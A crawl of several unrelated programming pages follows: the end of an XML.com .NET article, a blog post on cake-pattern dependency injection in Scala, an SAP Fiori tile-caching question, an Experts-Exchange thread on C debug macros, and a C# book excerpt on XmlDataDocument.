upStream.Close(); uploader.GetResponse(); } Conclusion This architecture is not for everybody. For some, the approach will place unwelcome constraints on W3C XML Schema and class design. Also throughput and security considerations may make it inappropriate for some applications. However, for applications that live in dynamic environments, you achieve true loose coupling of components with all the flexibility of XML. An XmlReader producing and consuming components of your application can be readily swapped out, improved, or reused by other applications or pipelines. It also reduces the amount of wiring required to tie components together. More tools are on the way for XML-centric applications in the upcoming versions of .NET and Windows, named Whidbey and Longhorn respectively. .Net brings XQuery Support and the new XmlReader and XmlWriter implementations ObjectReader and ObjectWriter, providing additional support for serializing and deserializing objects. Longhorn's XAML, which uses XML to define windows UI elements, can make interface elements a transformation away from your data or schema XML.
https://www.xml.com/pub/a/2004/05/12/dotnet.html
CC-MAIN-2018-34
en
refinedweb
The same content appears below, but please be warned that the internal links are broken, and the code formatting is not to my liking:The same content appears below, but please be warned that the internal links are broken, and the code formatting is not to my liking: Component Based Dependency Injection in Scala Initial version by John Sullivan, February 2013 Introduction As a software engineer at The Broad Institute, I’ve been very fortunate to be able to program in Scala for the past 2+ years. I got to start one major project from scratch, and was able to select the best Scala tools and libraries, and really take the time to work through a solid software design process. One of the earliest design decisions I needed to make on this project is what to use for dependency injection. I knew I could always fall back on using Java-based tools such as Spring or Guice, but I wanted to look around for a solution that might be a more natural approach for Scala. I happened upon the “cake pattern”, as described in Scalable Component Abstractions by Martin Odersky, and Real-World Scala: Dependency Injection (DI) by Jonas Bonér. I ended up adopting the cake pattern in the manner described in the Jonas Bonér paper, with some modifications. I’ve gained a lot of practical experience in using the cake pattern, (which I’ve come to call “component based dependency injection”, or “CBDI” for short), and wanted to share some of those lessons here. Two of the most interesting extensions of the cake pattern I discovered are hierarchical components, and encapsulating the details of a composite component, both discussed below. I use the examples from the Bonér paper as a launching point, and I focus my comparisons to Spring when considering Java based DI frameworks, since I am much more familiar with Spring than with Guice. One final note before I get going: Much of the source code presented here is available in GitHub project CBDI. I tend to use unit tests to exercise my code, so be sure to look in src/test/scala for running examples. The Bonér Approach I’ll use the approach presented in the Bonér paper as a launching point for describing how I employ the cake pattern. I start from this paper instead of the Odersky paper because the syntax is a little out-dated in the Odersky paper, and because the Bonér paper is a little easier to understand. This is the final UserRepository/UserService example that Bonér comes up with, with slight modifications from me to fill out some details of the example he leaves out: case class User(username: String, password: String) trait UserRepositoryComponent { val userRepository: UserRepository class UserRepository { def create(user: User): Unit = println("create " + user) } } trait UserServiceComponent { self: UserRepositoryComponent => val userService: UserService class UserService { def create(username: String, password: String): Unit = userRepository.create(User(username, password)) } } object ComponentRegistry extends UserServiceComponent with UserRepositoryComponent { val userRepository = new UserRepository val userService = new UserService } Bonér does not suggest any terminology for the “service” classes defined within the components, such as UserRepository and UserService in the above example. This makes the discussion below a little awkward. I’m going to call them injectables, for lack of a better term. In Spring, the injectable itself is called a component. By contrast, here, the component consists of both the injectable’s API, and the point of access for the injectable. Separating Interface from Implementation One drawback to the Bonér approach is that there is no interface defined for the UserRepository and UserService implementations; We haven’t really separated out interface and implementation for these injectables. Bonér chooses not to make this separation for the purpose of simplicity, but it is unclear if that choice is just for the sake of presentation in the paper, or if it applies to his use in production code as well. Without separation of interface and implementation, the only way to really get an alternative implementation of one of our injectables - including mock objects - is by subclassing the original and overriding its methods. I wasn’t satisfied with this; I needed a genuine interface for these injectables. So I took the above concept one step further, as follows: case class User(username: String, password: String) trait UserRepositoryComponent { val userRepository: UserRepository trait UserRepository { def create(user: User): Unit } } trait UserRepositoryComponentImpl extends UserRepositoryComponent { override val userRepository: UserRepository = new UserRepositoryImpl private class UserRepositoryImpl extends UserRepository { override def create(user: User) = println("create " + user) } } trait UserServiceComponent { val userService: UserService trait UserService { def create(username: String, password: String): Unit } } trait UserServiceComponentImpl extends UserServiceComponent { self: UserRepositoryComponent => override val userService: UserService = new UserServiceImpl private class UserServiceImpl extends UserService { override def create(username: String, password: String) = userRepository.create(User(username, password)) } } trait ComponentRegistry extends UserServiceComponent with UserRepositoryComponent trait ComponentRegistryImpl extends ComponentRegistry with UserServiceComponentImpl with UserRepositoryComponentImpl I’ve applied the separation of interface and implementation to the component registry itself, which is going to seem a little pointless until I introduce hierarchical components below. The above separation of interface and implementation creates an annoying plethora of seemingly meaningless repeated code, but this seems to be a general problem with separating implementation from interface. I could imagine a language having features to make this kind of pattern less verbose - for instance, a way to define an interface and a default implementation in a single pass - but I don’t know of any languages that support this. I’ve made the choice of putting the interface and default implementation in the same source file. This makes it easier to scan the contents of a directory, at the expense of having to skip some extra “preamble” towards the top of the file to get to the real content. Unit Testing with Mock Objects Jonas Bonér uses specs and jMock for unit testing DI components with mock objects. For the sake of variety, I will demonstrate a unit test with ScalaTest and EasyMock. First, let’s create our component registry of mock objects: // libraryDependencies += "org.scalatest" %% "scalatest" % "1.9.1" % "test" // // libraryDependencies += "org.easymock" % "easymockclassextension" % "3.1" % "test" import org.scalatest.mock.EasyMockSugar trait ComponentRegistryMock extends ComponentRegistry with EasyMockSugar { val userService = mock[UserService] val userRepository = mock[UserRepository] } Next, we’ll write a unit test for UserServiceImpl.create: import org.easymock.EasyMock.reset import org.scalatest.FlatSpec class UserServiceSpec extends FlatSpec with ComponentRegistryMock with UserServiceComponentImpl { behavior of "UserServiceImpl.create" it should "delegate to UserRepository.create" in { val user = User("charlie", "swordfish") expecting { userRepository.create(user) } whenExecuting(userRepository) { userService.create(user.username, user.password) } reset(userRepository) } } We make sure to inherit from UserServiceComponentImpl last, so that we get a UserServiceImpl as the userService injected dependency, hiding the mock UserService. Using Hierarchical Components for Expressing Design Constraints Let’s take the above example a step further, and add in multiple “service” and “repository” components. We could easily just add them in to the ComponentRegistry and ComponentRegistryImpl traits described above. But if we do this, we are building out a large flat space of objects with no organization to them. As the number of components grows, things will get more and more disorganized. We also want to be able to express design constraints such as “service components should be able to access repository components, but not vice versa.” In the following example, we show how to accomplish these goals using the existing user components, plus service and repository components for a new “project” entity: trait RepositoryComponent extends ProjectRepositoryComponent with UserRepositoryComponent trait RepositoryComponentImpl extends RepositoryComponent with ProjectRepositoryComponentImpl with UserRepositoryComponentImpl trait ServiceComponent extends ProjectServiceComponent with UserServiceComponent { self: RepositoryComponent => } trait ServiceComponentImpl extends ServiceComponent with ProjectServiceComponentImpl with UserServiceComponentImpl { self: RepositoryComponent => } trait TopComponent extends ServiceComponent with RepositoryComponent trait TopComponentImpl extends TopComponent with ServiceComponentImpl with RepositoryComponentImpl This prevents component access that does not conform to design constraint. For instance, suppose we tried to have the ProjectRepository access the UserService, as follows: trait ProjectRepositoryComponent { val projectRepository: ProjectRepository trait ProjectRepository { def create(project: Project): Unit } } trait ProjectRepositoryComponentImpl extends ProjectRepositoryComponent { self: UserServiceComponent => // <= does not compile! override val projectRepository: ProjectRepository = new ProjectRepositoryImpl private class ProjectRepositoryImpl extends ProjectRepository { override def create(project: Project) = println("create " + project) } } This design constraint violation produces the following compiler error: [error] RepositoryComponent.scala:9: illegal inheritance; [error] self-type RepositoryComponentImpl does not conform to ProjectRepositoryComponentImpl's selftype ProjectRepositoryComponentImpl with UserServiceComponent [error] with ProjectRepositoryComponentImpl [error] ^ Unfortunately, it’s not completely obvious what the problem is from the error message. Furthermore, the error message directs the developer’s attention to RepositoryComponentImpl, instead of ProjectRepositoryComponentImpl. This could easily lead a naive developer into attempting to resolve the error like so: trait RepositoryComponentImpl extends RepositoryComponent with ProjectRepositoryComponentImpl with UserRepositoryComponentImpl { self: ServiceComponent => } This fixes the compiler error, but it breaks our design constraint! I’ve developed the habit of adding warnings in comments to protect against this kind of mistake. For example: trait RepositoryComponentImpl extends RepositoryComponent with ProjectRepositoryComponentImpl with UserRepositoryComponentImpl { // do not self-type to ServiceComponent here as it breaks design constraint! } Examples of Application Design Constraints The particular design constraints that you will want to enforce will depend largely on the architecture or your particular application. However, I would like to demonstrate a couple of standard application architectures, to give you a sense of the possibilities. The components for a standard web application might be organized like so: A typical desktop GUI application with a service layer for accessing external resources might have the following organization: Mock Objects with Hierarchical Components For the sake of completeness, here is a suite of mock objects for the new, hierarchical design: import org.scalatest.mock.EasyMockSugar trait RepositoryComponentMock extends RepositoryComponent with EasyMockSugar { val projectRepository = mock[ProjectRepository] val userRepository = mock[UserRepository] } trait ServiceComponentMock extends ServiceComponent with EasyMockSugar { self: RepositoryComponent => val projectService = mock[ProjectService] val userService = mock[UserService] } trait TopComponentMock extends TopComponent with ServiceComponentMock Encapsulating the Details of a Composite Component One advantage to using hierarchical components for dependency injection over frameworks like Spring is that we can actually hide the implementation details of a composite component within its implementation. For instance, consider the following ChartViewFactory, which constructs an appropriate ChartView for the supplied Chart. The ChartViewFactoryImpl accomplishes this by delegating to another factory based on the particular type of chart: trait ChartViewFactoryComponent { val chartViewFactory: ChartViewFactory trait ChartViewFactory { def create(chart: Chart): ChartView } } trait ChartViewFactoryComponentImpl extends ChartViewFactoryComponent { self: HistogramViewFactoryComponent with ScatterPlotViewFactoryComponent => override val chartViewFactory: ChartViewFactory = new ChartViewFactoryImpl private class ChartViewFactoryImpl extends ChartViewFactory { override def create(chart: Chart) = { chart match { case c: Histogram => histogramViewFactory.create(c) case c: ScatterPlot => scatterPlotViewFactory.create(c) } } } } The ChartViewFactoryComponent is a sub-component of the ChartViewComponent, which in turn is a sub-component of the ViewComponent. But notice that the ChartViewComponentImpl contains extra components for the factories that we delegate to: trait ChartViewComponent extends ChartViewFactoryComponent trait ChartViewComponentImpl extends ChartViewComponent with ChartViewFactoryComponentImpl with HistogramViewFactoryComponentImpl with ScatterPlotViewFactoryComponentImpl trait ViewComponent extends TopViewComponent with ChartViewComponent trait ViewComponentImpl extends ViewComponent with TopViewComponentImpl with ChartViewComponentImpl This tactic of including the sub-components in the parent component implementation, but excluding them from the parent component interface, limits their visibility to within that parent component. For instance, it would be illegal for TopViewComponentImpl to self-type on HistogramViewFactoryComponent. Prototyping Components Spring provides support for injectables with different life cycle scopes, such as singleton, prototype, request, and session. The typical life cycle used in dependency injection is singleton, where a single instance is created for use throughout the entire application. Clearly, the dependency injection system described here is not going to support request and session scopes out of the box. But it is possible to mimic a prototyping Spring component. Here is how we would define and use it in Java and Spring: @Component @Scope("prototype") public class StatefulService { // ... } @Component public class ReferencingService { // every referencing component will get its own instance of the service @Autowired private StatefulService statefulService; } To mimic this with component based dependency injection in Scala, we can simply use a def instead of a val to define the injectable: trait StatefulServiceComponent { def statefulService: StatefulService trait StatefulService { // ... } } trait StatefulServiceComponentImpl extends StatefulServiceComponent { override def statefulService: StatefulService = new StatefulServiceImpl private class StatefulServiceImpl extends StatefulService { // ... } } The major drawback here is that each time statefulService is referenced, a new instance of the service will be created. With Spring prototypes, you get a single instance of StatefulService per referencing component. So to make this work, you need to reference the StatefulService exactly one in the referencing component: trait ReferencingServiceComponent { def referencingService: ReferencingService trait ReferencingService { // ... } } trait ReferencingServiceComponentImpl extends ReferencingServiceComponent { self: StatefulServiceComponent => override def statefulService: ReferencingService = new ReferencingServiceImpl private class ReferencingServiceImpl extends ReferencingService { // create and store a single instance of the stateful service for use here private val myStatefulService = statefulService // ... } } In the end, it will probably be more clear and manageable to create a StatefulServiceFactoryComponent, and inject the StatefulServiceFactory. The bottom line here is that component based dependency injection is not going to do any life cycle management for you. Injecting the Top Component into the Application There are many ways to make the component hierarchy accessible to the application. There is no right answer, but to a certain extent, it depends on the nature of the application. For instance, I’ve had to take different approaches for standalone applications, and for applications that are built with a framework such as Lift or Play. Standalone Application In a standalone client application, injecting the TopComponent is relatively straightforward. The top-level application class is conceptually defined as follows: abstract class MyApplication extends TopComponent { def start = { // ... } // ... } The only thing that makes the MyApplication class abstract is the fact that it has not been provided with an implementation of the TopComponent. This is easily done in the main method of the program: object MyApplication { def main(args: Array[String]) = (new MyApplication with TopComponentImpl).start } This approach allows us to write unit tests on the methods in the MyApplication class that use a mock implementation of the TopComponent. It also provides for an easy way to switch in alternate application contexts. For instance, maybe I want to stub out some of my service classes in test mode, so I don’t need to rely on external resources to test the user interface. I could easily accomplish this like so: object MyApplication { def main(args: Array[String]) = { val app = if (testMode) (new MyApplication with TopComponentTestImpl) else (new MyApplication with TopComponentImpl) app.start } } Framework Application We will need a different approach on an application built in a framework such as Lift or Play, as these frameworks normally take over the responsibilities of implementing the method main, and/or instantiating an object that represents the overarching application. For simplicity, we supply a singleton object that maintains a standard implementation of the TopComponent, like so: trait TopComponent extends RepositoryComponent with ServiceComponent object TopComponentImpl extends TopComponentImpl trait TopComponentImpl extends TopComponent with RepositoryComponentImpl with ServiceComponentImpl Now, in any of the hooks that the framework provides, we can use the TopComponentImpl companion object to access the server-side dependency injection framework. For example, here is some code for installing our own exception handler into the Lift framework. The call into the TopComponent singleton is highlighted in red: class BootLoader extends Bootable { def boot = { LiftRules.exceptionHandler.prepend { case (_, _, throwable) => { val errorReport = ErrorReport( throwable, Authenticater.userRequestVar.is.get.username) TopComponentImpl.errorReportService.handleErrorReport(errorReport) InternalServerErrorResponse() } } } } Gotchas and Edgy Cases Initialization and Initialization Order It’s important to know that your injectables are going to be initialized in Scala class linearization order. The linearization order for the components that belong to your TopComponentImpl will be initialized differently, depending on the order that the components are listed in the definition of your TopComponentImpl. Scala class linearization rules are complicated, so it’s probably not a good idea to make this component ordering have any special meaning. For readability, I prefer to order them lexicographically. It’s important to understand that the order does matter, but only if your components are accessing their dependencies at initialization time. For instance, consider the following example: trait Service1Component { val service1: Service1 trait Service1 { def announce(): Unit } } trait Service1ComponentImpl extends Service1Component { override val service1: Service1 = new Service1Impl private class Service1Impl extends Service1 { override def announce() = println("hi from Service1!") } } trait Service2Component { val service2: Service2 trait Service2 } trait Service2ComponentImpl extends Service2Component { self: Service1Component => override val service2: Service2 = new Service2Impl private class Service2Impl extends Service2 { service1.announce() // has service1 been initialized yet? } } trait TopComponent1 extends Service1Component with Service2Component // this works trait TopComponent1Impl extends TopComponent1 with Service1ComponentImpl with Service2ComponentImpl trait TopComponent2 extends Service2Component with Service1Component // this throws NullPointerException when initializing Service2Impl trait TopComponent2Impl extends TopComponent2 with Service2ComponentImpl with Service1ComponentImpl There are two ways around this problem. The simplest is to just agree that a component should not access any of its dependencies until after initialization is complete. Alternatively, you could always declare your injectables as lazy, and make sure there are no cyclic references between injectables during initialization. This latter approach may sound a little dubious, but there are instances where accessing dependencies during initialization comes in handy. For instance, it’s standard practice in Scala-Swing to lay out the child components of a panel when that panel is being initialized. If both the panel and some of its sub-components are injectables, then it would be quite natural for the panel to access an injected dependency at initialization time. It’s worth noting that, unlike in Spring, cyclic references between injectables is not in and of itself a problem. However, this is not a recommended practice, as cyclical dependencies between components is a sign of tight coupling between these components. These components should probably be refactored to remove the cyclic references. Does the Self Type Belong on the API or the Implementation? One question that often came up for me was, should I declare my dependencies just at the implementation level, or at the API level as well? This question applies to both simple, leaf-node components, as well as container components. It is only strictly necessary on the implementation class, but where to put it is a matter of style. Generally speaking, I try to ask myself, “is this dependency an implementation detail of the service?” Normally it is, but sometimes it makes sense at the interface level. Consider, for example, a ControllerComponent in a typical MVC application. It’s a central part of the MVC design pattern that the ControllerComponent references the ModelComponent and the ViewComponent. In this case, I would choose to add the self types on the ControllerComponent, and not just the ControllerComponentImpl. Two Injectables with the Same Name Even though we are able to organize our components into hierarchies, and restrict access to components in various ways, we still end up with all our injectables in a single name space. Any name collisions are going to produce a compiler error about incompatible types, even if the injectables with the conflicting names are never available from any single component. Why Overriding the Injectable in the Implementation is So Verbose It may seem overly verbose to repeat the type of the injectable when overriding it in the implementation class. For instance, here I have to redeclare exampleService to have type ExampleService: trait ExampleServiceComponent { val exampleService: ExampleService trait ExampleService } trait ExampleServiceComponentImpl extends ExampleServiceComponent { // why do I have to redeclare the type of exampleService?? override val exampleService: ExampleService = new ExampleServiceImpl private class ExampleServiceImpl extends ExampleService } If I leave out this type redeclaration, I am actually narrowing the type of exampleService to ExampleServiceImpl, since this is the inferred type from the right-hand side of the assignment. But this is illegal, since I have declared ExampleServiceImpl to be private: [error] ExampleServiceComponent.scala:12: private class ExampleServiceImpl escapes its defining scope as part of type ExampleServiceComponentImpl.this.ExampleServiceImpl [error] override val exampleService = new ExampleServiceImpl [error] ^ Admittedly, making the implementation class private does not accomplish much, since dependent classes will self type on ExampleServiceComponent, and not ExampleServiceComponentImpl. The only place this type could actually be accessed would be in a containing component implementation, such as TopComponentImpl. It would be highly unusual to be making any use of ExampleServiceImpl there. In the end, I chose to make these implementation classes private based on the principle of information hiding. You might choose to not bother making the implementation classes private. Indeed, if we were to take this thinking to its logical conclusion, the interface elements would be protected, and the implementation would be private[this], like so: trait UserRepositoryComponent { protected val userRepository: UserRepository protected trait UserRepository { def create(user: User): Unit } } trait UserRepositoryComponentImpl extends UserRepositoryComponent { override protected val userRepository: UserRepository = new UserRepositoryImpl private[this] class UserRepositoryImpl extends UserRepository { override def create(user: User) = println("create " + user) } } Conclusions There are two major drawbacks to component based dependency injection as I see it. One major problem is that the code constructs can be quite difficult to understand by those unfamiliar with the pattern. I would recommend developer-level documentation describing your particular usage patterns to overcome this obstacle. As with many new programming techniques, it can seem confusing and strange, but I expect most developers would get used to it pretty quickly. The other major problem with this approach is that it is a little verbose at the source code level. There’s certainly more boilerplate involved than we are used to with Scala, or that we would need to generate when using a library like Spring. Component based injection dependency also has many benefits. Some are described in this paper, particularly hierarchical components and component encapsulation. Hierarchical components allow users to express their component structure in a rich, tree-like fashion instead of as a single flat component space. Design constraints (i.e., which components can see which other components) become enforceable at compile time. Finally, component encapsulation allows the details of a composite component to be hidden from other components in the hierarchy. Tailoring a solution around a language-level feature allows for much greater flexibility than using a library or framework, and other people may find themselves solving problems with a hand-rolled component based dependency injection system that would not be possible with a pre-rolled solution. A language-level solution can potentially reduce the application footprint, which can be an important issue for desktop and mobile applications. Also, the costs of learning and maintaining knowledge of a complex framework like Spring, and integrating it into your application, can often be underestimated. I would imagine that, in the end, these costs would be similar to the costs of using the component based dependency injection described here. But my intent in this paper is not to evangelize the cake pattern approach to dependency injection. Instead, I try to provide practical examples for using this approach, and to discuss and flesh out some of the issues that you might come across that are not presented in earlier work. I really appreciate you sharing this. Your observation that cake is difficult at first for those unfamiliar with the pattern is spot-on. Regarding your second observation, that the code is too boilerplate-y, I wonder whether there is an opportunity here for a thin "Scala-Guice" that can cut down on that. Thanks for the feedback Morgan. In regards to Scala & Guice, I noticed this post that came by quite recently, but I haven't had time to look at it closely yet: In regards to reducing boilerplate, there is a discussion about this now on scala-user Google group. This may even be possible with the new macros language feature in Scala 2.10. This comment has been removed by the author.
http://scabl.blogspot.com/2013/02/cbdi.html
CC-MAIN-2018-34
en
refinedweb
Find Questions & Answers Can't find what you're looking for? Visit the Questions & Answers page! Hi, I have three FIORI applications deployed in SAP and there is one common gateway service being used in all the three applications. I have created three static tiles ex. Tile1 Tile2 Tile3 and mapped the respective application against it. All the deployed apps are using same namespace. The issue is : When I click on first tile, the URL looks good ..../FioriLaunchpad.html#tile1semanticobject-display and it does display the correct application. Now if I go back and click on another tile ( any Tile 2 or Tile 3), although the URL changes according to the button click but the I get the same application which is assigned to Tile 1. Now if I refresh my browser and then click Tile 2, it does show the correct version. Summary : All the tiles are showing up the right URL but the application which they are displaying is the one which user clicks for first time and then rest of the tiles take the same until we refresh the browser. Hi, I found the solution for it, 1. Namespace for all these applications was same, and I guess that made browser confused on which application to take 2. After resolving namespace issue, it was still giving me the older version of application and that was Caching issue - I followed following transactions to get rid of it : /UI2/DELETE_CACHe /UI2/CHIP_SYNCHRONIZE_CACHE /UI2/DELETE_CACHE_AFTER_IMP /UI2/INVALIDATE_CLIENT_CACHES /UI2/INVALIDATE_GLOBAL_CACHES /UI5/APP_INDEX_CALCULATE
https://answers.sap.com/questions/212221/sap-launchpad-tiles-browser-refresh-issue.html
CC-MAIN-2018-34
en
refinedweb
def TEST_ECHO_OUTPUT #define TEST_ECHO_MACRO(x) my_debug_out(#x); // expands to call #else #define TEST_ECHO_MACRO(x) // expands to nothing #endif Select all Open in new window Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle. The MCTS: Microsoft Exchange Server 2010 certification validates your skills in supporting the maintenance and administration of the Exchange servers in an enterprise environment. Learn everything you need to know with this course. #ifdef TEST_ECHO_OUTPUT #define TEST_ECHO_MACRO(x) my_debug_out(x) // expands to call #else #define TEST_ECHO_MACRO(x) // expands to nothing #endif void my_debug_out(int x) { /* ... */ } int main(void) { int a = 1; TEST_ECHO_MACRO(a); return 0; } #ifdef TEST_ECHO_OUTPUT #define TEST_ECHO_MACRO(x) my_debug_out(x); // expands to call #else #define TEST_ECHO_MACRO(x) // expands to nothing #endif TEST_ECHO_MACRO("test output") ifdef TEST_ECHO_OUTPUT #define TEST_ECHO_MACRO(x) my_debug_out(x) // Will expect a semi-colon #else #define TEST_ECHO_MACRO(x) do {} while(false) // Will expect a semi-colon also, but will be optimized away #endif #include <stdio.h> #define DO_TRACE // Comment me to change behavior #ifdef DO_TRACE #define TRACE(x) printf("trace: %d\n", x); #else #define TRACE(x) #endif void foo() { printf ("Part2\n"); } int main() { int n = 0; if (n < 10) printf ("Part1\n"); else TRACE(n) // When DO_TRACE is disabled the semi-colon goes with it so foo() becomes part of this if/else foo(); return 0; } #ifdef DO_TRACE #define TRACE1(x) printf("trace: %d\n", x) #else #define TRACE1(x) #endif #ifdef DO_TRACE #define TRACE2(x) printf("trace: %d\n", x); #else #define TRACE2(x) ; #endif // Check the code below with trace both on and off. if ( a ) TRACE1(x) else TRACE1(y) if ( a ) TRACE1(x); else TRACE1(y); if ( a ) TRACE2(x) else TRACE2(y) if ( a ) TRACE2(x); else TRACE2 The macros involved are a bit cumbersome. Perhaps better is to call the function and let it do an immediate return if debugging is disabled. Another solution is to encapsulate the function call #define MY_DEBUG_OUT(a) {if (TEST_ECHO_OUTPUT) my_debug_out(a);} Good Luck, Kent Sorry, what do you mean "expands to nothing" exactly? Literally, blank space? (Being sure because I will need to defend my decision to superiors.) The MCTS: Microsoft Exchange Server 2010 certification validates your skills in supporting the maintenance and administration of the Exchange servers in an enterprise environment. Learn everything you need to know with this course. >>space? Yes, exactly. The preprocessor will just remove the line if TEST_ECHO_OUTPUT is not set. And for #define MY_DEBUG_OUT(a) {if (TEST_ECHO_OUTPUT) my_debug_out(a);}, I think that's a logical test that is left over if test mode not #defined, isn't it? Don't want that either, my superiors would tell me to live with the three-line calls. #define MY_DEBUG_OUT(a) {if (TEST_ECHO_OUTPUT) my_debug_out(a);} will cause a aompiler error if TEST_ECHO_OUTPUT is not set, I am not sure that this is what you want... jkr: true, although I was planning on setting TEST_ECHO_OUTPUT to either 1 or 0. But your comment makes me wonder... a more experienced coworker does it differently: #define TEST_ECHO_OUTPUT // comments this out to disable #ifdef TEST_ECHO_OUTPUT whereas I do this: #define TEST_ECHO_OUTPUT 1 // change to 0 to disable #if TEST_ECHO_OUTPUT Is his approach more traditional? Does it result in tighter code? Is there a disadvantage to my approach, other than the danger of omitting a #define altogether and breaking the code (as you point out)? (Thanks. Sorry to piggy back this question, but I seem to have expert attention.) Simply this is more than enough (note that I removed the ; at the end of the macro too - to avoid confusion) : Open in new window His approach is how this is normally done, yes. The reason being, the semantics of exists or otherwise are clearer than does it exists and does it have a value and if so what is that value. Because it was used in the Q in my_debug_out(#x); and would be required for my_debug_out(a); I'd also rather not use it. Do you mean the "#"? My compiler documentation tells me that's how you pass parameters to a macro. If I have that wrong, I will figure that out momentarily... >>macro. No, not really: The number-sign or stringizing operator (#) converts macro parameters (after expansion) to string constants. It is used only with macros that take arguments. If it precedes a formal parameter in the macro definition, the actual argument passed by the macro invocation is enclosed in quotation marks and treated as a string literal. The string literal then replaces each occurrence of a combination of the stringizing operator and formal parameter within the macro definition. White space preceding the first token of the actual argument and following the last token of the actual argument is ignored. Any white space between the tokens in the actual argument is reduced to a single white space in the resulting string literal. Thus, if a comment occurs between two tokens in the actual argument, it is reduced to a single white space. The resulting string literal is automatically concatenated with any adjacent string literals from which it is separated only by white space Open in new window I've known some compilers to get ratty if you put a ; at the end of the usage of the macro , e.g TEST_ECHO_MACRO(a); // In release this is a noop but leaves a rogue semi-colon behind The release build is a no-op so you end up with a line that just contains a ; and whilst this shouldn't be an issue I've known some compilers to generate a warning. To get around this I normally use a do/while noop, like below. It'll get optimized away in release build but prevent the potential warning. Open in new window Not really since my_debug_out takes an int as parameter. >> BTW, then you'll be fine with Except for the fact that my_debug_out doesn't take a string as parameter, I still prefer not having a ; at the end of a macro ... It's so counter-intuitive this way : #define TEST_ECHO_MACRO(x) my_debug_out(x); int a = 0; TEST_ECHO_MACRO(a) /* <--- no ; at the end of this line */ some_more_code(); that I prefer "forcing" the user of my macro to add the ; #define TEST_ECHO_MACRO(x) my_debug_out(x) int a = 0; TEST_ECHO_MACRO(a); /* <--- now the ; HAS to be there at the end of this line */ some_more_code(); IMO, no. The way I suggest forces the semi-colon to be added at the end when you use it so it looks more naturally like a function call. >> I prefer "forcing" the user of my macro to add the ; Me too, hence my suggestion above :) Well, I saw it, but a semicolon is not 'rogut' at all. It would expand to void my_main_code() { int a; a =1; ; } which is legal C/C++-. Agreed, I never said it wasn't... it's just that some (mainly older) compilers will issue a warning if you build with high warning levels. It also forces the caller to provide it so it makes the code more consistent (IMO). I'm not saying do it, I'm just pointing it out as a consideration. Ah, never seen that ... The C standard explicitly allows empty statements : (6.8.3) expression-statement: expression(opt) ; (the opt meaning optional of course) What the C standard doesn't allow however, is a { } block followed by a ; To avoid that, you DO need macro's like these if they involve { } blocks : #define SOME_BLOCK_MACRO do { \ int i = 0; \ fun(i); \ } while(0) Interesting perspective on the need for consistency of semicolon use in main code, I see your point. But should be no technical problems with leaving the semicolon in the macro, right? Just requires extra care by the reviewer? I would have trouble convincing people of the evilrx loop approach, and I don't want a stray semicolon, so that might be my best route..... Technically, it's ok, yes. I just think not having it in the macro is more consistent. >> and I don't want a stray semicolon Don't worry about a stray semicolon (empty statement) ... It's no problem at all. It's perfectly legal. The loop approach evilrix showed was just to avoid warnings on certain old compilers. I have seen warnings with rogue semicolons too, so I'm prejudiced against them. Unless you actually use the macro like this : TEST_ECHO_MACRO(a); >> I have seen warnings with rogue semicolons too, so I'm prejudiced against them. Odd, I've never seen them for empty statements. Oh well ;) Open in new window >> Ah, never seen that ... The C standard explicitly allows empty statements : evil's right .. i'm currently working with a nintendo-ds compiler .. and we get warnings for those *lonesome* semicolons .. since we have set option "warning to errors" this became an issue .. however, you're right jkr .. its legal anyway .. ike One last follow-on, then I'll close this out. Given the defines #ifdef TEST_ENABLE_OUTPUT #define TEST_OUTPUT(x) print_test_message(x); // expands to call; note semicolon is in macro #else #define TEST_OUTPUT(x) // expands to nothing #endif and the calls int aa; // = 45; aa = 45; print_test_message("Hello1 TEST_OUTPUT("Hello2 %i,%i\r", aa, aa) why would the outputs be: ?Hello1 45, 45 Hello2 7387, 2552 crazy stuff. My function is below, just puts the characters out UART0. Don't want to make this another draw on your time, just wanted to know any initial thoughts, then I'll start a new question if it gets involved... char s_buf [100]; void print_test_message( flash char *format, ...) { va_list ap; va_start(ap,format); vsprintf(s_buf, format, ap); va_end(ap); putstr0(s_buf); } Okay got some help from This has some improvement, but still need to figure out that "?" #ifdef TEST_ENABLE_OUTPUT #define TEST_OUTPUT(...) print_test_message( __VA_ARGS__); #else #define TEST_OUTPUT(x) // expands to nothing #endif Can you show the complete code ? Didn't I give you all the working parts? Turns out the question mark follows the first call, so it seems like that's some left over crap in the buffer or something. I'll need to talk to the guys who wrote that function... Thanks a ton, guys, for all the help. This is the CodeVision compiler for Atmel microprocessors. Apparently it accepts the variable-list macros, do you see any danger with using it? >>using it? If it works, that's fine, yet it won't be portable - that's the downside... That's why I was asking to see the complete code ;) To find where the question mark comes from. Oh, I would never inflict all that on you. That;s a 5,000 point question. Will throw that question to a coworker, at least I have the macro working so I'm happy. I think the code below should demonstrate. Paul Open in new window You mean, like this http:#20844363 ? Paul Not sure I'm back yet but I do have a browse in 'C' most days. You guys hold the fort so well :) I've been working on a private project but that's coming to an end soon. My next is a technical one in C so I hope to be visiting often. Paul
https://www.experts-exchange.com/questions/23145299/How-to-make-my-debug-macros-very-concise.html
CC-MAIN-2018-34
en
refinedweb
The representation of relational table data can be poured like water back and forth between a DataSet object and an XML representation. In particular, the XmlDataDocument class, defined in the System.Xml namespace, has a special relationship to the DataSet class. It allows us to load relational data (or XML data, of course) and manipulate that data using the W3C Document Object Model (DOM). One way to do the binding is to pass the DataSet object to the XmlDataDocument constructor: DataSet ds = new DataSet(); adapter.Fill( ds, "FOOD_DES" ); XmlDataDocument xmlDoc = new XmlDataDocument( ds ); Now we can manipulate the XmlDataDocument just as if we had directly loaded it with XML data. In this section we look at the DOM, its navigation ... No credit card required
https://www.safaribooksonline.com/library/view/c-primer-a/0201729555/0201729555_ch05lev1sec11.html
CC-MAIN-2018-34
en
refinedweb
